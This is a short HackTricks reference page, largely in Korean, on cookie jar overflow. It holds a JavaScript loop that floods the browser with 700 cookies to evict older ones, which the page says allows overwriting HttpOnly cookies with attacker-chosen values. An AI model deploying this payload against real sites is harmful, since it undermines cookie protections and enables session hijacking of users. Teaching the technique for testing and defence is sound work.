Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

브라우저는 페이지에 대해 저장할 수 있는 쿠키의 수에 제한이 있습니다. 따라서 어떤 이유로 쿠키를 사라지게 해야 하는 경우, 쿠키 항아리를 오버플로우시켜 가장 오래된 쿠키가 삭제되도록 할 수 있습니다:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

이 공격은 HttpOnly 쿠키를 덮어쓸 수 있는 방법으로, 쿠키를 삭제한 후 원하는 값으로 재설정할 수 있습니다.

이 실험실이 포함된 게시물에서 확인하세요.

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

Last updated